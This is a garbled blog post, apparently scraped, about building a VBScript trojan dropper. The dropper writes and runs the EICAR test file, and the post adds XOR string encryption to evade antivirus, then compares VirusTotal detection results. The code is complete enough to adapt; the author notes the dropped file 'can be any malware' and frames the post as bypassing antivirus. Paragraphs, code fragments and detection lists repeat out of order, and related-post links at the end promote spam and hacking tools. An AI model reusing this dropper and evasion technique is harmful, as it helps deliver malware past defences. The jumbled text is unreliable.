 |
| Source:pixabay.com |
In this antivirus challange case, I will do some simple things by creating a VBS trojan dropper then I will apply string encryption to some particular strings. In this case I will encrypt "Scripting.FileSystemObject" and "WScript.Shell". Later I will compare the antivirus detection between original trojan and trojan with encrypted string.
Here's the trojan code:
t="58,35,4F,21,50,25,40,41,50,5B,34,5C,50,5A,58,35,34,28,50,5E,29,37,432,29,37,7D,24,45,49,43,41,52,2D,53,54,41,4E,44,41,52,44,2D,41,4E,54,49,56,49,52,55,53,2D,54,45,53,54,2D,46,49,4C,45"
t=t&",21,24,48,2B,48,2A"
tmp = Split(t, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
pth = fso.getspecialfolder(0) & "\eicar.com"
Set f = fso.CreateTextFile(pth, ForWriting)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l))
For j = 1 To r
f.Write Chr(b)
Next
Else
f.Write Chr(b)
End If
Next
f.Close
WScript.CreateObject("WScript.Shell").run(pth) The trojan will drop eicar file and execute it. In reality, the dropped file can be any malware.
For the encryption function, I will use a simple xor algorithm.
Original trojan: https://www.virustotal.com/#/file/70887a9f231d4289ccf96b6486393f0a43e5162c0e19a36b978c8b5bd6eec1f2/detection
Successful antivirus:
Successful antivirus:
About the detection rate, I can say antivirus that don't detect the malware sample have bad malware script detection. ClamAV, DrWeb, ESET-NOD32, Yandex quite good but it is easy to bypass the detection.
Next time, I will encrypt the hex code of eicar file and let's see if this technique can bypass your antivirus protection.
End If
Next
f.Close
WScript.CreateObject("WScript.Shell").run(pth) The trojan will drop eicar file and execute it. In reality, the dropped file can be any malware.
For the encryption function, I will use a simple xor algorithm.
Function CryptXor(sText)If the encryption has been applied then there are two line modified:
Dim I
Dim RetStr
Dim Charuse,CharPwd
For I = 1 to Len(sText)
charuse = Mid(sText,I,1)
charpwd = Mid("0",(I mod len("0"))+1,1)
retstr = retstr + chr(asc(charuse) xor asc(charpwd))
Next
CryptXor = retstr
End Function
Set fso = CreateObject(CryptXor ("cSBY@DY^W vY\UcICDU]RZUSD"))Now I will scan the original and the encrypted version. Here'are the results:
and
WScript.CreateObject(CryptXor("gcSBY@D cXU\\")).run(pth)
Original trojan: https://www.virustotal.com/#/file/70887a9f231d4289ccf96b6486393f0a43e5162c0e19a36b978c8b5bd6eec1f2/detection
Successful antivirus:
Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, ClamAV, DrWeb, Emsisoft, eScan, ESET-NOD32, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Yandex, Zillya, ZoneAlarmFailed antivirus:
AegisLab, AhnLab-V3, Antiy-AVL, Avast Mobile Security, Avira, Babable, Bkav, CAT-QuickHeal, CMC, Cyren, F-Prot, Fortinet, Ikarus, Jiangmin, K7AntiVirus, K7GW, Kingsoft, Malwarebytes, McAfee, McAfee-GW-Edition, Microsoft, Panda, Qihoo-360, Rising, Sophos AV, SUPERAntiSpyware, Symantec, TACHYON, Tencent, TheHacker, TrendMicro, TrendMicro-HouseCall, VBA32, VIPRE, ViRobot, Zoner, Alibaba, CrowdStrike Falcon, Cybereason, Cylance, eGambit, Endgame, Palo Alto Networks, SentinelOne, Sophos ML, Symantec Mobile Insight, Trustlook, WebrootEncrypted trojan: https://www.virustotal.com/#/file/a40b07d7fa2a7a11d5be19ac7f151cfe7dd65b2168fa4f0f6f24de848b89ff45/detection
Successful antivirus:
Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, Emsisoft, eScan, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Zillya, ZoneAlarmThere are four antivirus that become fail to detect the encrypted version:
ClamAV, DrWeb, ESET-NOD32, YandexAs you can see from the VirusTotal link, most of antivirus still detect the threat as eicar because the VBS trojan contain hex code of eicar file.
About the detection rate, I can say antivirus that don't detect the malware sample have bad malware script detection. ClamAV, DrWeb, ESET-NOD32, Yandex quite good but it is easy to bypass the detection.
Next time, I will encrypt the hex code of eicar file and let's see if this technique can bypass your antivirus protection.
AegisLab, AhnLab-V3, Antiy-AVL, Avast Mobile Security, Avira, Babable, Bkav, CAT-QuickHeal, CMC, Cyren, F-Prot, Fortinet, Ikarus, Jiangmin, K7AntiVirus, K7GW, Kingsoft, Malwarebytes, McAfee, McAfee-GW-Edition, Microsoft, Panda, Qihoo-360, Rising, Sophos AV, SUPERAntiSpyware, Symantec, TACHYON, Tencent, TheHacker, TrendMicro, TrendMicro-HouseCall, VBA32, VIPRE, ViRobot, Zoner, Alibaba, CrowdStrike Falcon, Cybereason, Cylance, eGambit, Endgame, Palo Alto Networks, SentinelOne, Sophos ML, Symantec Mobile Insight, Trustlook, WebrootEncrypted trojan: https://www.virustotal.com/#/file/a40b07d7fa2a7a11d5be19ac7f151cfe7dd65b2168fa4f0f6f24de848b89ff45/detection
Successful antivirus:
Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, Emsisoft, eScan, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Zillya, ZoneAlarmThere are four antivirus that become fail to detect the encrypted version:
ClamAV, DrWeb, ESET-NOD32, YandexAs you can see from the VirusTotal link, most of antivirus still detect the threat as eicar because the VBS trojan contain hex code of eicar file.
About the detection rate, I can say antivirus that don't detect the malware sample have bad malware script detection. ClamAV, DrWeb, ESET-NOD32, Yandex quite good but it is easy to bypass the detection.
Next time, I will encrypt the hex code of eicar file and let's see if this technique can bypass your antivirus protection.
Related Posts
- Cara Install Apktools Di Linux Oke kali ini saya akan share Cara Install ApkTools Di Linux. JUDUL LEBIH LENGKAP SILAHKAN KLIK LINK BERIKUT Apktool ialah sebuah alat untuk decom ...
- 14 Tools Termux Baru -----› Menu BRUTEPORCE NEWS: ⟨1⟩ -» Report FB ...
- Cara Menjalani Contoh Hidup Sehat Yang Benar Secara Rutin www.Duluran.Net - Cara Menjalani Pola Hidup Sehat yang Benar Secara Rutin Macam Mana trik menjalani tumpuan hidup sehat&nbs ...
- Is Title [ ...
- Cara Spam Whatsapp Dan Tools Lainnya Via Termux Unlimited 2019 Spam Whatsapp 100% Work kali ini aku akan membagikan tutorial yang mungkin banyak diminati oleh kalian.. ada beberapa macam ibarat : Hack Facebook ...
- Russian Airborne Troops Call Of Duty The russian airborne troops or vdv (from "vozdushno-desantnye voyska rossii", russian: ...